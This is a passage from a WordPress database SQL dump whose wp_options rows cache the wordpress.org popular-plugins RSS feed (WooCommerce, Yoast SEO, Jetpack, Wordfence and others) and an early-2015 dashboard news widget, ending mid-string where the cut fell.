+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"753@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WooCommerce - excelling eCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29860@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8321@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast&#039;s WordPress SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"23862@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Your WordPress, Streamlined.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Google Analytics by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2316@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"Track your WordPress site easily with the latest tracking codes and lots added data for search result pages and error pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"21738@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"The easiest, most effective way to secure WordPress in seconds.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Chris Wiegman\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"18101@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29832@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:137:\"Wordfence Security is a free enterprise class security and performance plugin that makes your site up to 50 times faster and more secure.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Google Analytics Dashboard for WP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/plugins/google-analytics-dashboard-for-wp/#post-50539\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 10 Mar 2013 17:07:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"50539@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Displays Google Analytics reports and real-time statistics in your WordPress Dashboard. Inserts the latest tracking code in every page of your site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alin Marcu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"UpdraftPlus Backup and Restoration\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/updraftplus/#post-38058\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 May 2012 15:14:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"38058@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Backup and restoration made easy. Complete backups; manual or scheduled (backup to S3, Dropbox, Google Drive, Rackspace, FTP, SFTP, email + others).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Anderson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25254@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"132@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"NextGEN Facebook - Advanced Social SEO for Facebook, Google+, Pinterest, Twitter &amp; More\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/nextgen-facebook/#post-40409\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Jul 2012 20:13:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"40409@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Display your content in the best possible way on Facebook, Google+, Twitter, Pinterest, etc. - no matter how your webpage is shared!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"JS Morisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:11:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 08 Feb 2015 16:09:49 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:7:\"expires\";s:29:\"Sun, 08 Feb 2015 16:14:15 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Sun, 08 Feb 2015 15:39:15 +0000\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20141124234515\";}", "no");
INSERT INTO `wp_options` VALUES("887", "_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109", "1423454989", "no");
INSERT INTO `wp_options` VALUES("888", "_transient_feed_mod_b9388c83948825c1edaef0d856b7b109", "1423411789", "no");
INSERT INTO `wp_options` VALUES("889", "_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51", "1423454989", "no");
INSERT INTO `wp_options` VALUES("890", "_transient_dash_4077549d03da2e451c8b5f002294ff51", "<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2014/12/dinah/\'>WordPress 4.1 “Dinah”</a> <span class=\"rss-date\">December 18, 2014</span><div class=\"rssSummary\">Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is [&hellip;]</div></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://ma.tt/2015/02/productivity-of-working-from-home/\'>Matt: Productivity of Working from Home</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2015/02/tom-fords-15-things/\'>Matt: Tom Ford’s 15 Things</a></li><li><a class=\'rsswidget\' href=\'http://wptavern.com/customize-your-login-page-using-the-wordpress-customizer\'>WPTavern: Customize Your Login Page Using the WordPress Customizer</a></li></ul></div><div class=\"rss-widget\"><ul><li class=\'dashboard-news-plugin\'><span>Popular Plugin:</span> <a href=\'https://wordpress.org/plugins/woocommerce/\' class=\'dashboard-news-plugin-link\'>WooCommerce - excelling eCommerce</a>&nbsp;<span>(<a href=\'plugin-install.php?tab=plugin-information&amp;plugin=woocommerce&amp;_wpnonce=feb3440802&amp;TB_iframe=true&amp;width=600&amp;height=800\' class=\'thickbox\' title=\'WooCommerce - excelling 